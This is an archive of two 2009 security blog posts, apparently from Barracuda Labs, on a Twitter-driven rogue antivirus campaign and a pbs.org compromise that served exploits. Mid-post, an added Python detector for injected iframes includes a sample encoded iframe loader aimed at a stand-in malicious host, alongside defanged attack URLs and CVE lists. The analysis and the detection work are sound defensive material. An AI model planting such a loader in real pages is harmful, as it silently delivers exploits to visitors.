Archive for September, 2009

Twitter Trending Topics Used to Propagate Rogue AV

Friday, September 18th, 2009

Posted by: Barracuda Labs

Last night, a Purewire employee was directed to a Rogue AV website after clicking on a link in a tweet that matched a popular topic. Subsequent analysis uncovered an active Rogue AV propagation campaign that attempts to lure users to malicious websites via tweets that contain popular terms searched on Twitter.

The malicious tweets draw part of their word content from Twitter’s Trending Topics list; a screenshot of the list at the time of this writing is shown below.

Twitter Trending Topics

Searches that use some of the above topics lead to these tweets, as shown in the following examples:

hxxp://securityland.cn/?uid=144&pid=3&ttl=31c48520c54

which acts as a traffic distribution system for a Rogue AV operation; the chain of redirections ends at one of the following Rogue AV distribution points:

All of the above sites serve javascript-based fake system scanners:

which attempt to compel the user to download Windows PC Defender, a brand of Rogue AV software. AV detections for the Rogue AV malware instance served are non-existent:

http://www.virustotal.com/analisis/9a155d62af5b43be29018f7d0f52875503c6d15a3c891cb5807ed123398889ca-1253323103

Users of the PWSS are protected from this campaign.


PBS Website Compromised, Used to Serve Exploits

Wednesday, September 16th, 2009

Posted by: Barracuda Labs

On Monday of this week, Purewire’s Malicious Javascript Detection (MJD) engine identified malicious activity originating from a page that belongs to the popular website pbs.org. Specifically, attempts to access certain PBS website pages yielded javascript that serves exploits from a malicious domain via an iframe.

A forensic analysis of this attack revealed that the user requested the following:

hxxp://www.pbs.org/parents/curiousgeorge

which in turn requested:

hxxp://dipsy.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

instead of:

hxxp://www.pbs.org/parents/ptframe/images/bground-leaderboard.jpg

Accessing the image off of dipsy.pbs.org requires login credentials, as shown in the following screenshot.

PBS Login Prompt

If correct credentials are not provided, dipsy.pbs.org serves an error page that looks normal:

… until you look under the hood. The end of the error page’s source:

contains obfuscated javascript placed there by a malicious third party. Deobfuscated, this code writes an iframe that loads malicious javascript from the following malicious URL:

hxxp://qxfcuc.info/f.cgi?jzo
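A static triage pass over a page like the error page described above, as an added example that is not Purewire's MJD engine or any code from this post. It assumes only what the post states (an obfuscated script on the page writes an iframe that points at an off-site domain); the sample error page, the placeholder hostnames (`auth.example.invalid`, `dropper.invalid`) and the two decoding heuristics are constructed here. The point is that the common literal-encoding tricks (`unescape('%3C...')`, `String.fromCharCode(...)`) can be undone statically, without executing the script, and the decoded text then checked for iframes whose host differs from the page's own.

```python
"""Static triage of fetched HTML for injected off-origin iframe loaders.

Added example, not code from the post. Page, hostnames and heuristics are constructed.
"""
import re
from urllib.parse import unquote, urlparse

# Script bodies and iframe src attributes, matched across line breaks.
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_SRC = re.compile(r"<iframe\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)

# Two literal-encoding idioms seen in injected loaders: numeric char codes and percent escapes.
FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\(\s*([\d,\s]+)\)")
UNESCAPE_LITERAL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)

# Crude obfuscation indicators; their presence is recorded alongside any finding.
OBFUSCATION_MARKERS = ("unescape(", "String.fromCharCode(", "eval(", "document.write(")


def js_unescape(text):
    """Mimic JavaScript unescape(): %uXXXX code units first, then ordinary %XX escapes."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text)


def static_decode(script):
    """Resolve fromCharCode(...) and unescape('...') literals without running the script."""
    decoded = FROM_CHAR_CODE.sub(
        lambda m: "".join(chr(int(c)) for c in m.group(1).replace(" ", "").split(",") if c),
        script,
    )
    return UNESCAPE_LITERAL.sub(lambda m: js_unescape(m.group(2)), decoded)


def triage_page(page_url, html):
    """Return iframes (raw or script-written) whose host is not the page's own host."""
    page_host = urlparse(page_url).hostname
    findings, seen = [], set()

    def record(src, markers):
        host = urlparse(src).hostname
        # Relative URLs have no host and stay on the page's origin; skip them and same-host frames.
        if host and host != page_host and src not in seen:
            seen.add(src)
            findings.append({"iframe_src": src, "host": host, "markers": markers})

    for block in SCRIPT_BLOCK.findall(html):
        markers = [m for m in OBFUSCATION_MARKERS if m in block]
        for src in IFRAME_SRC.findall(static_decode(block)):
            record(src, markers)
    for src in IFRAME_SRC.findall(html):
        record(src, [])
    return findings


# Constructed sample: a 401 error page with a benign same-origin frame and an injected encoded loader.
SAMPLE_PAGE_URL = "http://auth.example.invalid/images/banner.jpg"
SAMPLE_ERROR_PAGE = """<html><head><title>401 Authorization Required</title></head>
<body><h1>Authorization Required</h1>
<p>This server could not verify that you are authorized to access the document requested.</p>
<iframe src="http://auth.example.invalid/footer.html" width="468" height="60"></iframe>
<script type="text/javascript">document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fdropper.invalid%2Ff.cgi%3Fabc%22%20width%3D0%20height%3D0%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for finding in triage_page(SAMPLE_PAGE_URL, SAMPLE_ERROR_PAGE):
        print(finding)
```

On the sample page the same-origin footer frame is ignored and the decoded loader is reported as an iframe to `dropper.invalid` with the `unescape(` and `document.write(` markers. Static decoding only covers literal encodings; a loader that builds its string with arithmetic or a key needs a sandboxed interpreter, which is the gap a product engine fills.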

The above URL serves exploits that target a variety of software vulnerabilities, including those in Acrobat Reader (CVE-2008-2992, CVE-2009-0927, and CVE-2007-5659), AOL Radio AmpX (CVE-2007-6250), AOL SuperBuddy (CVE-2006-5820) and Apple QuickTime (CVE-2007-0015).

The domain qxfcuc.info is part of a malware campaign that includes tens of similar websites hosted on a handful of common IP addresses. Similar exploit code was served from most of these domains, although a handful (e.g., yyoqny.info) display a message that suggests the criminal behind this campaign is compromising systems to build a botnet he will likely later lease. Translated from Russian, that message tells prospective leasers to “Send a message to ICQ #559156803; stats available under ststst02.”

Users of the PWSS are protected from this campaign.

Update, Sep 18, 2:49PM ET: PBS has notified Purewire that the malicious javascript has been removed from its site.
